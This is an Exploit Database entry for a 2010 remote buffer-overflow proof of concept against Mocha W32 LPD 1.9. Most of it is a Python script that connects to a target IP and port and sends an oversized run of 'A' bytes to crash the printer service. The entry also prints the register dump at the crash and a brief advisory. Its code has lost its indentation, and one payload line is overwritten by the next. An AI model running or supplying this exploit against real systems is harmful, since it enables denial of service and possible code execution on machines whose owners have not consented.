Mocha W32 LPD 1.9 – Remote Buffer Overflow (PoC)

• Exploit Database
• 20 阅读

• 作者： mr_me
  日期： 2010-04-15
• 类别：

  • dos
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/33838/

• source: https://www.securityfocus.com/bid/39498/info
  
  Mocha W32 LPD is prone to a remote buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data.
  
  Successful exploits may allow attackers to execute arbitrary code with the privileges of the user running the affected application. Failed exploit attempts will result in a denial-of-service condition.
  
  This issue affects W32 LPD 1.9; other versions may be vulnerable as well. 
  
  #!/usr/bin/python
  # #################################################################
  # Mocha LPD v1.9 Remote Buffer Overflow DoS PoC
  # Author: mr_me
  # Software Link: http://mochasoft.dk/lpd.htm
  # Version: 1.9
  # Tested on: Windows XP SP3
  # Advisory: http://www.corelan.be:8800/advisories.php?id=10-023
  # Greetz to: Corelan Security Team
  # http://www.corelan.be:8800/index.php/security/corelan-team-members/
  # ##################################################################
  # Script provided 'as is', without any warranty.
  # Use for educational purposes only.
  # Do not use this code to do anything illegal !
  # Corelan does not want anyone to use this script
  # for malicious and/or illegal purposes.
  # Corelan cannot be held responsible for any illegal use.
  #
  # Note : you are not allowed to edit/modify this code. 
  # If you do, Corelan cannot be held responsible for any damages.
  # ##################################################################
  # Access violation here:
  # MOV ECX,DWORD PTR DS:[EBX]
  #
  # The registers:
  # EAX 00A2F978 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
  # ECX 00006161
  # EDX 00A20168
  # EBX 61616161
  # ESP 0012F4B8
  # EBP 0012F6D4
  # ESI 00A2F970 ASCII "aaaaaaaaaaaaaaaaaaaaaaaaaaaa"..
  # EDI 61616161
  # EIP 7C91AB8E ntdll.7C91AB8E
   
  import sys, socket
   
  print "********************************************************"
  print "Mocha LPD Buffer Overflow DoS"
  print " by mr_me"
  print " http://net-ninja.net/ - mr_me(AT)corelan.be"
  print "********************************************************"
   
  if len(sys.argv) < 3:
  print "Usage: " + sys.argv[0] + " <target ip> <port>"
  sys.exit(0)
   
  exploit = '\x05\x64\x65\x66\x61\x75\x6c\x74\x20'
  exploit = '\x41' * 1500
  exploit += '\x20\x61\x6c\x6c\x0a'
   
  host = sys.argv[1]
  port = int(sys.argv[2])
   
  s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
  try:
  connect = s.connect((host,port))
  except:
  print "[-] Cant connect!"
   
  s.send("\x02")
  print "[+] Sending evil payload.. ph33r o.O"
  s.send(exploit)
  print '[+] Server DoSed!'
  s.close()